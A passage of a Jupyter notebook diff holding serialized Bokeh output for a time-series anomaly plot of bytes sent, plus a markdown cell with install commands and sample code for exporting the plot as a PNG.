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AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAArn6EkqOCE0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAE5zn6wMnec/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACCiPgjLdgDAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA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\",\"dtype\":\"float64\",\"shape\":[840]}},\"selected\":{\"id\":\"1084\"},\"selection_policy\":{\"id\":\"1085\"}},\"id\":\"1002\",\"type\":\"ColumnDataSource\"},{\"attributes\":{\"days\":[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31]},\"id\":\"1052\",\"type\":\"DaysTicker\"},{\"attributes\":{\"num_minor_ticks\":5,\"tickers\":[{\"id\":\"1166\"},{\"id\":\"1167\"},{\"id\":\"1168\"},{\"id\":\"1169\"},{\"id\":\"1170\"},{\"id\":\"1171\"},{\"id\":\"1172\"},{\"id\":\"1173\"},{\"id\":\"1174\"},{\"id\":\"1175\"},{\"id\":\"1176\"},{\"id\":\"1177\"}]},\"id\":\"1124\",\"type\":\"DatetimeTicker\"},{\"attributes\":{\"formatter\":{\"id\":\"1129\"},\"ticker\":{\"id\":\"1124\"}},\"id\":\"1123\",\"type\":\"DatetimeAxis\"},{\"attributes\":{\"months\":[0,2,4,6,8,10]},\"id\":\"1057\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"data_source\":{\"id\":\"1002\"},\"glyph\":{\"id\":\"1041\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"1042\"},\"selection_glyph\":null,\"view\":{\"id\":\"1044\"}},\"id\":\"1043\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.2},\"fill_color\":{\"value\":\"firebrick\"},\"line_color\":{\"value\":\"firebrick\"},\"size\":{\"units\":\"screen\",\"value\":12},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"TotalBytesSent\"}},\"id\":\"1089\",\"type\":\"CircleX\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"value\":\"blue\"},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"value\":\"blue\"},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"score\"}},\"id\":\"1134\",\"type\":\"Circle\"},{\"attributes\":{\"days\":[1,4,7,10,13,16,19,22,25,28]},\"id\":\"1053\",\"type\":\"DaysTicker\"},{\"attributes\":{\"line_color\":\"green\",\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"baseline\"}},\"id\":\"1064\",\"type\":\"Line\"},{\"attributes\":{\"click_policy\":\"hide\",\"items\":[{\"id\":\"1062\"},{\"id\":\"1086\"},{\"id\":\"1111\"}],\"location\":\"top_left\"},\"id\":\"1061\",\"type\":\"Legend\"},{\"attributes\":{},\"id\":\"1085\",\"type\":\"UnionRenderers\"},{\"attributes\":{\"months\":[0,6]},\"id\":\"1059\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"months\":[0,4,8]},\"id\":\"1058\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"source\":{\"id\":\"1002\"}},\"id\":\"1067\",\"type\":\"CDSView\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"value\":\"#1f77b4\"},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"value\":\"navy\"},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"TotalBytesSent\"}},\"id\":\"1042\",\"type\":\"Circle\"},{\"attributes\":{\"days\":[1,15]},\"id\":\"1055\",\"type\":\"DaysTicker\"},{\"attributes\":{},\"id\":\"1060\",\"type\":\"YearsTicker\"},{\"attributes\":{\"bottom_units\":\"screen\",\"fill_alpha\":0.5,\"fill_color\":\"lightgrey\",\"left_units\":\"screen\",\"level\":\"overlay\",\"line_alpha\":1.0,\"line_color\":\"black\",\"line_dash\":[4,4],\"line_width\":2,\"render_mode\":\"css\",\"right_units\":\"screen\",\"top_units\":\"screen\"},\"id\":\"1028\",\"type\":\"BoxAnnotation\"},{\"attributes\":{\"end\":1560163860000.0,\"start\":1556237340000.0},\"id\":\"1115\",\"type\":\"Range1d\"},{\"attributes\":{\"days\":[1,8,15,22]},\"id\":\"1054\",\"type\":\"DaysTicker\"},{\"attributes\":{},\"id\":\"1117\",\"type\":\"DataRange1d\"},{\"attributes\":{\"data\":{\"TimeGenerated\":{\"__ndarray__\":\"AAAoMCKrdkIAAMiCeax2QgAACCgor3ZC\",\"dtype\":\"float64\",\"shape\":[3]},\"TotalBytesSent\":[916767394,1555286702,1768911488],\"baseline\":[662107538,1212399509,1391114419],\"index\":[299,399,599],\"level_0\":[0,1,2],\"score\":{\"__ndarray__\":\"LR7s4ND7CUCufoSSo4ITQMrUaIzsFhZA\",\"dtype\":\"float64\",\"shape\":[3]}},\"selected\":{\"id\":\"1163\"},\"selection_policy\":{\"id\":\"1164\"}},\"id\":\"1087\",\"type\":\"ColumnDataSource\"},{\"attributes\":{\"data_source\":{\"id\":\"1002\"},\"glyph\":{\"id\":\"1064\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"1065\"},\"selection_glyph\":null,\"view\":{\"id\":\"1067\"}},\"id\":\"1066\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"align\":\"right\",\"text\":\"Drag the middle or edges of the selection box to change the range in the main chart\",\"text_font_size\":{\"value\":\"10px\"}},\"id\":\"1128\",\"type\":\"Title\"},{\"attributes\":{},\"id\":\"1119\",\"type\":\"LinearScale\"},{\"attributes\":{\"months\":[0,1,2,3,4,5,6,7,8,9,10,11]},\"id\":\"1056\",\"type\":\"MonthsTicker\"},{\"attributes\":{},\"id\":\"1121\",\"type\":\"LinearScale\"},{\"attributes\":{\"label\":{\"value\":\"anomalies\"},\"renderers\":[{\"id\":\"1091\"}]},\"id\":\"1111\",\"type\":\"LegendItem\"},{\"attributes\":{\"source\":{\"id\":\"1002\"}},\"id\":\"1044\",\"type\":\"CDSView\"}],\"root_ids\":[\"1142\"]},\"title\":\"Bokeh Application\",\"version\":\"2.0.1\"}};\n",
+       "  var render_items = [{\"docid\":\"510ea36a-1825-4b95-885b-3ea6e271064e\",\"root_ids\":[\"1142\"],\"roots\":{\"1142\":\"cbb2b4b8-7f1b-40c4-b7a4-2312b538e373\"}}];\n",
+       "  root.Bokeh.embed.embed_items_notebook(docs_json, render_items);\n",
+       "\n",
+       "  }\n",
+       "  if (root.Bokeh !== undefined) {\n",
+       "    embed_document(root);\n",
+       "  } else {\n",
+       "    var attempts = 0;\n",
+       "    var timer = setInterval(function(root) {\n",
+       "      if (root.Bokeh !== undefined) {\n",
+       "        clearInterval(timer);\n",
+       "        embed_document(root);\n",
+       "      } else {\n",
+       "        attempts++;\n",
+       "        if (attempts > 100) {\n",
+       "          clearInterval(timer);\n",
+       "          console.log(\"Bokeh: ERROR: Unable to run BokehJS code because BokehJS library is missing\");\n",
+       "        }\n",
+       "      }\n",
+       "    }, 10, root)\n",
+       "  }\n",
+       "})(window);"
+      ],
+      "application/vnd.bokehjs_exec.v0+json": ""
+     },
+     "metadata": {
+      "application/vnd.bokehjs_exec.v0+json": {
+       "id": "1142"
+      }
+     },
+     "output_type": "display_data"
+    }
+   ],
+   "source": [
+    "timeseries_anomalies_plot = display_timeseries_anomolies(data=timeseriesdemo, y=\"TotalBytesSent\");"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "## Exporting Plots as PNGs\n",
+    "To use bokeh.io image export functions you need selenium, phantomjs and pillow installed:\n",
+    "\n",
+    "`conda install -c bokeh selenium phantomjs pillow`\n",
+    "\n",
+    "or\n",
+    "\n",
+    "`pip install selenium pillow`\n",
+    "`npm install -g phantomjs-prebuilt`\n",
+    "\n",
+    "For phantomjs see https://phantomjs.org/download.html.\n",
+    "\n",
+    "Once the prerequisites are installed you can create a plot and save the return value to a variable. \n",
+    "Then export the plot using `export_png` function.\n",
+    "\n",
+    "***Sample code to export png***\n",
+    "\n",
+    "```python\n",
+    "from bokeh.io import export_png\n",
+    "from IPython.display import Image\n",
+    "\n",
+    "# Create a plot\n",
+    "timeseries_anomaly_plot = display_timeseries_anomolies(\n",
+    "    data=timeseriesdemo, y=\"TotalBytesSent\"\n",
+    ")\n",
+    "\n",
+    "# Export\n",
+    "file_name = \"plot.png\"\n",
+    "export_png(timeseries_anomaly_plot, filename=file_name)\n",
+    "\n",
+    "# Read it and show it\n",
+    "display(Markdown(f\"## Here is our saved plot: {file_name}\"))\n",
+    "Image(filename=file_name)\n",
+    "```"
+   ]
+  },
+  {
+   "attachments": {
+    "TimeSeriesKQLPlotly.PNG": {
+     "image/png": "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